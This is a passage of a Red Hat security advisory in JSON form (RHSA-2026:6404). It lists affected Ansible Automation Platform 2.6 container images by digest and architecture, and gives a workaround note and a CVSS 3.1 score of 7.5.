"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6404"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
